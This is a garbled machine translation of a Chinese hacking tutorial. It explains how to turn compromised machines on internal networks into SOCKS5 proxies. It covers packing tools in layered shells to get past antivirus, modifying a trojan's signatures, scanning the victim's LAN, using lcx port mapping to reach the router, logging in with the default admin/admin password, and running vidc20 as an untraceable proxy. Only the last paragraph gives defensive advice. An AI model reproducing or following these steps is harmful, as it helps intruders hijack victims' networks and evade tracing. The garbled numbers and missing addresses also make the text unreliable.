Hacker teach you the inner web of the broiler made the Socks5 server-the vulnerabilities and early warning-the black bar safety net

ID MYHACK58:62200613492
Type myhack58
Reporter 佚名
Modified 2006-12-30T00:00:00


Other words in the hung it to get a large number of broiler later, all the Black friends may have wondered how to use the hands of these spoils. Someone who likes peeping other people's privacy, some people might use a Trojan Keylogger to steal People's QQ password, as well as people may want to steal other people's broadband Internet account charge Q coins. May be we have not thought of the network in these broiler made the SOCKS5 Server? So, we will invade you can use these chickens as a springboard, the Black house will also be full of much. Someone said within the network as a SOCKS5 server is impossible, even became also unable to take advantage of, good, today I will some of my practical experience to write out and share, nothing technical content, share if you have better method, please feel free to enlighten me!

First to introduce the use of the tool, lcx.exe this is a reverse connection of the network port mapping Tool, the VIDC20. exe is also a port mapping tool, but it also has a proxy server function, support http/socks4/socks5 proxy support proxy authentication, support for udp Agent, support secondary proxy; and S Scanner, the only one executable file, small and convenient, the sweep port is the most appropriate. These tools online are Download, In For the proxy services before, we need to first make a fewfree kill, because most of the antivirus software is to kill the lcx. exe and S The scanner, if not for thefree to kill, then an upload could be antivirus software to kill, as shown in Figure 1:


Figure 1

Like this powerful card bar, at the command line there is no way to abort, so only afree to kill, the other antivirus software at the command line can be aborted, but need some tricks, because they are thread protected by a conventional method was suspended. I used the command line to kill over rising, the only method is relatively cumbersome, so it is not demonstrated here. As for thefree to killmethod well, as long as the simple addition of the lower case you can cross the border, according to my experiments, before adding a compass 3. 5, plus aspack 2.12, and then after the addition of the Beidou 3. 5, so that after treatment the vast majority of mollusc member is not to kill this two programs, huh. Simple right, the virus also is to be differentiated, if it is some of the popular Trojan, plus the triple of the housing is notfree to kill, for some not too important hack tools, antivirus software will become relatively loose. We just drill the antivirus this empty, if it is added to a triple shell also had no antivirus software, then don't bother them the feature code to modify off, it may be through a virus, modification of the method online has many animations, everyone can find their own find my PCSHARE horse is such as the Kabbah, rising, River people, rising, Kingsoft, Norton, trend antivirus such as very easily and also easily through the various search horse tools, this is what I modify the feature code after a triple shell made of a super strong tool. Huh. Some digress, get to the point.

Tools for preparing a complete, start following as a proxy. First of all open your Trojan client program, the above of these tools are uploaded to the network in the broiler on, put in WINDOWS directory?, file name., the best change, lest cause the other attention. Open the other command character, type the command: ipconfig /all look at the broiler of the IP address, such as, get this This machine and the gateway IP address, we can use the S scanner to with it in the same segment of the IP address to scan, see the broiler gateway is what type. S scanner I believe we will use it.

Command-line: s-jk tcp 80,23,3389,1433,139,445 2 0

This s-jk is I added a triple shellfree killafter the S scanner, which command in the entire network, scan for open 1 3 9 3 3 8 9 1 4 3 3 8 0 2 3 port of the host, Oh, this is to penetrate the internal network to prepare for, and perhaps have very important information there. Haha. The scan results are as follows Figure 2:


Figure 2

After the scan found the broiler gateway open 8 port number 0, indicating that the gateway must be a router. How to log into it the router? We all know the broadband router in the foreign network is not login, only by it's internal network login, don't want to feed broiler screen control, with broiler IE to log in? Non-riding, so easily exposed, and besides the broiler on administrator perhaps now is a computer, you is simply no way to control, the following on your own computer open a command prompt, the command: lcx-listen 2 1 8 0 0 0 and then back to the broiler CMD, command: lcx-slave 2 1 8 0 explain: is my external network IP, so it will be broiler Broadband Router 8 0 port mapped to My Computer the 2 1 end, I connected to the machine 8 0 0 0 port you can. As shown in Figure 3:


Figure 3

The next step is to open IE, the address bar, type:回车后 that long-awaited and very familiar login screen appeared. This is exactly what Broadband Router login screen, but it's not my Broadband Router, but another LAN Broadband Router, I am skilled to type the default user name and password, admin admin, is determined after successful login. As shown in Figure 4, Figure 5.


Figure 4


Figure 5

The next job is simply hundreds of times, set up a virtual server pointing to the broiler, the port is set into a strange port, do not set to 8 0 8 to 0, because a broadband router to use this port, it is not allowed to set into this port, I set 2 2 3 3, Save after, we go back to the broiler of the command line, the command: vidc20-d-p 2 2 3 3 This command means to console mode to start the vidc20. exe this app open 2 2 3 3 Service Port to provide the proxy service. This broiler has begun to provide SOCK5 service, and the router on the map has also been working, we have to do is open SOCK5 client program, set SOCKS5 server IP address and port, that is, the broilers of the external network IP. We will IE drag the icon to the SocksCap32 on the icon to create a new shortcut, so that later we log on to the ASP of the horse when you can double-click the SocksCap32 in IE to log in. If you do not feel assured that 可以 登录 www.123cha.com and look at the IP, the IP address displayed is your broiler, the IP, the use of such a proxy than to use the anonymous HTTP proxy to the security of the many, because to provide you with the agent's personal computer, and the IP is not fixed, in an internal LAN, without some monitoring software to record any connection, and the PC restart after the vidc20. exe is not running, can be said to be without a trace, so even if someone traced your words, also can only be found in your broiler of the IP so far, and then want to continue the tracing is not too easy.

Someone said that if the administrator of the Broadband Router password get rid of, that's not didn't have to play, I randomly selected five LAN for testing, all is the default password, it seems to set the default password of the probability or full high. I analyzed the reasons: first, may is a broadband router only from within the network connection, the administrator for which security awareness is insufficient. Second, within the network of PC users are noobs, no need for security settings. Third, the administrator slacking, didn't take it seriously. To be honest my broadband router is also set to the default password, why not get rid of? I think I should belong to the second case, well, within the network all is a rookie user, it is simply necessary to modify off, so it exposes a security issue, once within the network of computers in a Trojan, the intruder is likely to get your broadband account with your broadband account brush Q coins, brush business; it may also log your ISP will be your broadband account to modify off, so you're not on the network. If the intruders take you as a springboard, he made a bad thing by you holding the bag, wouldn't it be more wronged it. So, we must be the internal network of security vigilance. The hit patch hit, the modification of the default password to modify off so that you can defend against the most primary of Raider attacks. But to be absolutely safe, it is impossible, in this world there is no absolute security.